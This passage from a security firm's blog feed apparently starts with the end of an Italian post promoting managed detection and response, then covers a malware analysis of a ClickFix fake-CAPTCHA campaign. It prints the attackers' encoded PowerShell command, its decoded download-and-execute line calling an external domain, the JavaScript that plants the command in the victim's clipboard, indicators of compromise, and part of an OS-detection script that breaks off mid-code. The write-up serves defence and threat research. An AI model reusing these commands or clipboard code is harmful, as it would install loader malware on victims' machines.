&lt;li&gt;analisi post-incidente, anche tramite attività di digital forensics, per individuare le cause e prevenire eventi simili in futuro&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Un supporto concreto, pensato per accompagnare l’azienda anche nei momenti più critici.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Un Natale più sicuro, anche per l’IT&lt;/h2&gt;
&lt;p&gt;Scegliere un servizio di Managed Detection and Response significa poter affrontare le festività con maggiore serenità, sapendo che la sicurezza resta sotto controllo, anche quando l’ufficio è vuoto.
Mentre tutti staccano, la cybersecurity resta accesa.
E con i servizi MDR di Certego, la tua azienda può contare su una protezione continua, affidabile e sempre attiva — anche a Natale.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/malware-analysis-clickfix/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACKUlEQVR42mWSWU/bUBCF+eelYWmhalXaCgpCqKCEQJq3UlrkbJDEJCxRjGMnTrxc2/d6qWj7XB58OtehUiUejo7HHn0z45kFx/Vx2lJxoV7hTKnjeqDB5zEcn8PyRK6xK6DPOIyZwMgSMB0BFkZ53tiOYFrzmAX8YcHxAjQbLZh3OppKDfpggJ9xgiTkCAMOEQrEuTi9E0gCgYCKOUzkQJtcn1IxKjrzCBhQUtH6jV3jHsfTXyiN71ExExwaCWrTGMVRggo9H5H29ARVM8aOlkKnLm0mp4gIRF0ScGQT0KNqX02Og1GKfU1gZxhhT4tQGsVQrAhlIyYlKJE2hikVSvFJT2GwGJzTmH4Mi8Y2qIDDCMhoBLXdQafRxG2vT97ARa2OG7UHtdPFRb2B+vcztBQFPAgR+QF+hCE8RqJm6L9RhyEMglouAW1ailxEm5aiXg3Qal+ic3mN824PXfJmW0X9vEt+CbV/i97NEP1bDT3KvSaXOeZ4Bs9LMXMIWD4o4ap/gzvNwIQ+TG0GP9+YgPvYhYyl/4ulM3LvUa4v8pFHdviwsF5YxbvlNbwtvMThh32cVL5AOW0Q2EMokhz8vyRcAuQ5zdjc5RlN5GIkcGNxFe+frWBr6Q2KKx/xanEdm0ubOCpV4QfRE+BcBCVJ2OTxVufbppG3lgnw/AW2C69RXNtGdfczTsrfssPyceYxntFIT0TQzA9F5gVRxsI4m7g8G9ItTl3+5y8yZLHM984PvQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/71c1d/Malware%20ClickFix.png&quot; srcset=&quot;/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/804b2/Malware%20ClickFix.png 384w,
/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/e5715/Malware%20ClickFix.png 768w,
/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/71c1d/Malware%20ClickFix.png 1536w,
/website/static/12e43e3ba20cf4f9174eec6beff1b2bf/a878e/Malware%20ClickFix.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[Malware Analysis]]></title><description><![CDATA[New ClickFix campaign shows growing sophistication and reach]]></description><link>https://www.certego.net/blog/malware-analysis-clickfix/</link><guid isPermaLink="false">malware-analysis-clickfix</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><pubDate>Sun, 07 Dec 2025 23:00:00 GMT</pubDate><content:encoded>&lt;h3&gt;Introduction&lt;/h3&gt;
&lt;p&gt;ClickFix is a well-known social-engineering technique that leads users to compromise themselves by pasting and executing a malicious command in the terminal of their operating system. In recent weeks, our Security Operations Team has directly observed this campaign being actively used, further confirming its relevance and real-world impact. As highlighted in several analyses by &lt;a href=&quot;https://x.com/joe4security/status/1979084146010886358&quot;&gt;Joe Security&lt;/a&gt;  and other researchers, this threat continues to evolve in its themes, delivery methods, and level of sophistication, remaining a highly effective attack vector even today.&lt;/p&gt;
&lt;p&gt;Starting from an initial finding shared by &lt;a href=&quot;https://x.com/BlinkzSec/status/1994669905866887306&quot;&gt;@BlinkzSec&lt;/a&gt;, our Threat Intelligence team expanded the investigation based on the data surfaced by our SecOps Team and identified several new domains linked to the ClickFix operation, which appears to be still ongoing. The analysis also revealed pages delivering OS-specific payloads targeting both Windows and macOS users. Based on multiple indicators, we believe with a high degree of confidence that these components were vibe-coded by a Russian-speaking operator.&lt;/p&gt;
&lt;h2&gt;Starting point&lt;/h2&gt;
&lt;p&gt;In this campaign the user is presented with the ClickFix lure: a blurred page displaying a fake verification in the background with a banner that mimics legitimate CAPTCHA challenge.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/e808b0eee2a6047f9ebd21637acdb9ae/ec09f/Pasted%20image%2020251204124821.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 106.77083333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAIAAADJt1n/AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACz0lEQVR42qWUy08TURSHq+7d+l/oBoJxhQt1aUgIYkpEIxISqaTaAoVqn1BetvRhK9hCeQgUmpIWrRgTFRbKgqCIhCCER5+0nb6m82qnnfHSIRMebVx48svMPffeb845uecO52K5ilMqPV8mY3SuTHpW7CqjC1dlnBLJpVu9nFH3qtn5w+I60tAc0M/8kxkcil1l9ca58vbjGof+D+NkcxSjHEUT6UwgGPR4vV6f3+fz7+17dnb3PB5vNpsFWymKZjczOhGZJMn9na3tjd8/lpf+bG4QOIYiqUgk7A/4vD5PNBqiqNyJyMyLAp+laQLH7UblcNsDfVN1n0reqx9U9hqe8BvLK66V3rzMfXg7BSfZzadhHMMmX4pWXtRZ7lxXydsEovaKyqqq6gqhmNej7uDeqwqFQkVhJAXrO1rt3SJjS4PdZh0w9onbBQZdn8kkEjbXCFoewzBcHEYQtbqbx+cpVB0arUbbr/nids5MWQeGjFNOp+G1HkWRojAMJxsaHnG5dQ6HKxgMrK2u7m5vRaHIr/X1D1+/9es0sRhUvGYc4zfVl5VcmbbZgJuIx1EEgdH04sLnni6lyaAFblE4TRDvbSM6qWDBPQvIgN8fhaBQ6GB+/p1M8mxwQIvjeAGYzvtZMvN93DQtaZztErpso3aHzT4zbh621D5V8NqVcmlz4cgMTGYyS6Odc/Kasda7Y2bd5IRFJRM+FwtvVNbX8mUiwX2k4DmDmXxkctk18mlQ4dBJ7JPWiXGL1WywTVjknQpx5yu11oSiWEH4qPIkDIciUDyRZLqV6UcyuBR0N0KLcpqIsmmehsEFACcUjUIYhh4vh0puI2tWYtNOZ1Jsmqfh/GmBHsXSecvkLU2k02Q2wxJnL8bx4CgwDA9CcOAgHAgnAhCcQhAUJ0AV/4CP4hNELB4H1yAcjsTiCZBF4Z9Bwdlc9tCovIFBLpcrCP8FiEgcngFN+hgAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Pasted image 20251204124821&quot; title=&quot;&quot; src=&quot;/website/static/e808b0eee2a6047f9ebd21637acdb9ae/71c1d/Pasted%20image%2020251204124821.png&quot; srcset=&quot;/website/static/e808b0eee2a6047f9ebd21637acdb9ae/804b2/Pasted%20image%2020251204124821.png 384w,
/website/static/e808b0eee2a6047f9ebd21637acdb9ae/e5715/Pasted%20image%2020251204124821.png 768w,
/website/static/e808b0eee2a6047f9ebd21637acdb9ae/71c1d/Pasted%20image%2020251204124821.png 1536w,
/website/static/e808b0eee2a6047f9ebd21637acdb9ae/ec09f/Pasted%20image%2020251204124821.png 1916w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
By pressing the button the user is presented with some instructions to follow in order to &quot;verify&quot; its request.
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/00c971affe3af1837d5b7666c9980d66/ec09f/Pasted%20image%2020251204124930.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 106.51041666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAVCAIAAADJt1n/AAAACXBIWXMAAA7EAAAOxAGVKw4bAAACzUlEQVR42qWUWU8TURTHK34An/wa+iAG4yMvPPmgxtTUPSEENS002EILCmVfpIVOpYVC2EFboi0BlJhoVAyIFqQkLLK0Zbp3pMvs01mc0jhJoY0Pnvwzy53zm/+5d84d0ZnCFtHFurwCTVqnsikvU6cvaUT5tWeLOkTDsz/NNke/fSWtgenVkxKeCuqzOUbfOkXcf4SIZti0GJYjSMofCB6AXtDr8/p8bs+By80fQJqm+VSW5YTktDKckzTt3t/Z2Vxf+b64vbWB4xiKwOFI2OsDPaAHgoIsw2Q4p08s/1qOI3B8ytg4pH5gkImft2ja9KaGdr1U/rjw6uWCovOS+1fi8aiQfBLGJrRqR23xwM3C1oZqhbrm+g2xWHJN+VTWoW26dVccDAVzwggCA80qS5uqR1lqnRwyGjrVKkWXrgMwVFUobj9RPorF47lhFNXq2mVyaX1zox7QGfSdX+btduvw2GTf9Pw7wAjwS5AThuHEw9ISiaTYbrN/XgVr+9f11v2W8e2q/l2TfQcAOiEoknvOBC4vK8m/cG7KMuE84JSDYVlvUG4OlvZE68yrJqAdRpCcMEWSc5YRQKP4ODOFoLjHC+15Qm4w8ssVWHOu67tbcRzPAnNH93SSWhw3WTXSVw1l7o21BJyA47F06ub2hqqqHEPR3DBFLY21zTbdG6kUf5h743LtLS8tLH/7urD046VtpqL8DgJnW21+5Mg56Zgeft9b/7r7mWVsYGTIZDbpRgeNlTXVSk23tusFkt3578zjCb4foWgs5cC3NMum+pEJLYfmpL8/1XE4JJR5HGYYJhDwQxCEHjkIeWx8F3EO4lsWjkoIZR6H+cAJAsMwkiIJkiQpikqmrogkTQnEyY0hBF8qb4tiWABK+INhXzjqhxL850VwgkrS/4AF/8NoNBQKhSORw2iMryL7zyDrKEPTvFITZlm+FiZzGwvwHxjGIqXZBOgiAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Pasted image 20251204124930&quot; title=&quot;&quot; src=&quot;/website/static/00c971affe3af1837d5b7666c9980d66/71c1d/Pasted%20image%2020251204124930.png&quot; srcset=&quot;/website/static/00c971affe3af1837d5b7666c9980d66/804b2/Pasted%20image%2020251204124930.png 384w,
/website/static/00c971affe3af1837d5b7666c9980d66/e5715/Pasted%20image%2020251204124930.png 768w,
/website/static/00c971affe3af1837d5b7666c9980d66/71c1d/Pasted%20image%2020251204124930.png 1536w,
/website/static/00c971affe3af1837d5b7666c9980d66/ec09f/Pasted%20image%2020251204124930.png 1916w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
These instruction automatically copy in the victim&apos;s clipboard the payload for another stage
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;powershell&quot;&gt;&lt;pre class=&quot;language-powershell&quot;&gt;&lt;code class=&quot;language-powershell&quot;&gt;powershell &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;wind &lt;span class=&quot;token function&quot;&gt;mi&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;-&lt;/span&gt;Enc JAByAD0AJwBkAG8AdwAgAHkAbwB1AHIAZgBpACcAOwAuACcAaQBlAHgAJwAoACYAKAAkAHIAWwA5AF0AKwAkAHIAWwAyAF0AKwAkAHIAWwA3AF0AKQAgAGgAdAB0AHAAcwA6AC8ALwBrAGoAYQByAHoALgBjAG8AbQAvAGoALgB0AHgAdAApAC4AQwBvAG4AdABlAG4AdAA=&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Decoding the Base64 coded text we obtain a web request to another page on the same domain, containing a text file&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;powershell&quot;&gt;&lt;pre class=&quot;language-powershell&quot;&gt;&lt;code class=&quot;language-powershell&quot;&gt;&lt;span class=&quot;token variable&quot;&gt;$r&lt;/span&gt;=&lt;span class=&quot;token string&quot;&gt;&apos;dow yourfi&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;iex&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&amp;amp;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$r&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;9&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$r&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;2&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;token variable&quot;&gt;$r&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;7&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; https:&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;/&lt;/span&gt;kjarz&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;com/j&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;txt&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Content&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The file j.txt contains an obfuscated PowerShell script whose purpose is to download the file named &lt;code class=&quot;language-text&quot;&gt;BMUAUFKZ.msi&lt;/code&gt; on the same domain. This file has been identified as &lt;strong&gt;HijackLoader&lt;/strong&gt; malware family.
From VirusTotal relation page, this sample is contacting IP &lt;code class=&quot;language-text&quot;&gt;212.11.64.95&lt;/code&gt;, possibly it&apos;s C2 server located in SC and with many other communicating files with high detection rate. This can be a sign of an wider and extended operation carried out by the Threat Actor: &lt;a href=&quot;https://www.virustotal.com/gui/ip-address/212.11.64.95/relations&quot;&gt;https://www.virustotal.com/gui/ip-address/212.11.64.95/relations&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Furthermore, the root page of the domain has an open directory, enabling us to access everything from the page, including the ClickFix source code named &lt;code class=&quot;language-text&quot;&gt;uri.html&lt;/code&gt;.&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 649px; &quot;&gt;
      &lt;a class=&quot;gatsby-resp-image-link&quot; href=&quot;/website/static/01218c962f9c18aac1e05b0c7097e904/7762d/Pasted%20image%2020251204125541.png&quot; style=&quot;display: block&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 71.09375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAB4klEQVR42o1S65KaMBT2/Z+k7Y/uG7Q7O21RZoWKq9t1oahIIBcSBIpAEugBdGv9057JZHKS811Okonnur7/03W9LM95wjavr+Xp1HVd27bdv2Ji2/aH9+8+3t3NLXtqGN+M2amq4EDrVutuHMDzNr/t9ODToHMd/6N5VgbwUNzud/rhoRFCQ8KodpbSmsvPn+RsJhnTtqXWazWfS9NUX7/IvOgxk7IsAdl1qiwl57KREtZ1pTlXSaIYU0KoqtIiVVkGLP2gFMoG8GJhT6dr1+3iSO22arvVCLVxRCjDeZ6mKVwi5jzBcVgUxU1TE9M07u+XjtMtFnL+qCxLPj9r3w9DFFJKoyhCCBFCPM9Nj8db8HL53TRfPK/bbKTv6+DQKyOEQ4SSJMEYM8rS9EgJuShfXZjj2ObshwvgF1kU55MIRSGKOOeEkjiOhRBVVY1P+Ndtr1aObbtB0PsB1pGYYIyiWAAY0BhnWYYxyfP81rZtPRrGGmw/PTVSdRdltA8ObOgZlMH8arUGiluwEDxNf8F7CCGlVGNUQzRNU9c1LC5zoy4xUkziqA9C44QzFKHdbrcPAlBDQ8+HMATblDGowYSEYViWf37+JMuOQFw3TS8r5agGab8hZV2fs8GVhopr278BQCIX5Q/U98wAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Pasted image 20251204125541&quot; title=&quot;&quot; src=&quot;/website/static/01218c962f9c18aac1e05b0c7097e904/7762d/Pasted%20image%2020251204125541.png&quot; srcset=&quot;/website/static/01218c962f9c18aac1e05b0c7097e904/804b2/Pasted%20image%2020251204125541.png 384w,
/website/static/01218c962f9c18aac1e05b0c7097e904/7762d/Pasted%20image%2020251204125541.png 649w&quot; sizes=&quot;(max-width: 649px) 100vw, 649px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
  &lt;/a&gt;
    &lt;/span&gt;
&lt;/div&gt;
The directory seems to host also another variant of HijackLoader, named `MRXTOHRL.msi`.
&lt;h3&gt;Web page&lt;/h3&gt;
&lt;p&gt;The HTML source page itself is fairly common in this kind of attack: it contains a JavaScript code whose main purpose is to dynamically decode and build the malicious web page. The loaded page loads the images and hosts the payload shown above, manipulating user clipboard.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;javascript&quot;&gt;&lt;pre class=&quot;language-javascript&quot;&gt;&lt;code class=&quot;language-javascript&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;copyToClipboard&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
navigator&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;clipboard&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;writeText&lt;/span&gt;
                &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;powershell -wind mi -Enc JAByAD0AJwBkAG8AdwAgAHkAbwB1AHIAZgBpACcAOwAuACcAaQBlAHgAJwAoACYAKAAkAHIAWwA5AF0AKwAkAHIAWwAyAF0AKwAkAHIAWwA3AF0AKQAgAGgAdAB0AHAAcwA6AC8ALwBrAGoAYQByAHoALgBjAG8AbQAvAGoALgB0AHgAdAApAC4AQwBvAG4AdABlAG4AdAA=&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Pivoting&lt;/h3&gt;
&lt;p&gt;The malicious page is hosted on IP address &lt;code class=&quot;language-text&quot;&gt;88.214.50.121&lt;/code&gt;, a Russian IP address part of AS 216341, OPTIMA LLC.
Pivoting on the IP address that is hosting the domain, we discovered a wider ClickFix Booking.com themed campaign.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;hxxps[:]//account-captcha-id4234[.cfd/uri.html
hxxps[:]//account-bookscaptcha[.com/uri.html
hxxps[:]//account-bookextranet[.icu/uri.html
hxxps[:]//account-bookcaptcha[.com/uri.html
hxxps[:]//account-bookcaptcha[.cfd/uri.html
hxxps[:]//account-extranetcaptchapulse[.com/uri.html
https[:]//account-extranetpulser[.com/uri.html
hxxps[:]//account-extrapulse[.cfd/uri.html&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Another variant: OS specific payload&lt;/h3&gt;
&lt;p&gt;One domain in particular caught our attention:
&lt;code class=&quot;language-text&quot;&gt;hxxps[:]//account-extracaptcha[.com/uri.html&lt;/code&gt;
Despite being visually nearly identical to other pages in the campaign, it has a different source code, aiming to a winder audience.
In fact, the JavaScript code of this page looks for the operating system of the user, displaying a different page if the user is accessing through MacOS or Windows:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;javascript&quot;&gt;&lt;pre class=&quot;language-javascript&quot;&gt;&lt;code class=&quot;language-javascript&quot;&gt;	&lt;span class=&quot;token comment&quot;&gt;// Функция для определения операционной системы|&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;getOS&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; userAgent &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; navigator&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;userAgent&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;toLowerCase&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;userAgent&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;includes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;win&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;windows&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;userAgent&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;includes&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;mac&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;mac&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;other&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	
	&lt;span class=&quot;token comment&quot;&gt;// [...]&lt;/span&gt;
	
    &lt;span class=&quot;token comment&quot;&gt;// Альтернативный подход - перехват события отправки формы&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;interceptFormSubmission&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        document&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;addEventListener&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;submit&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;e&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
            &lt;span class=&quot;token comment&quot;&gt;// Проверяем, связано ли событие с CAPTCHA&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;e&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;target&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;closest&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;awswaf-captcha&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
                e&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;preventDefault&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
                e&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;stopPropagation&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

                &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; os &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;getOS&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

                &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;os &lt;span class=&quot;token operator&quot;&gt;===&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;windows&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
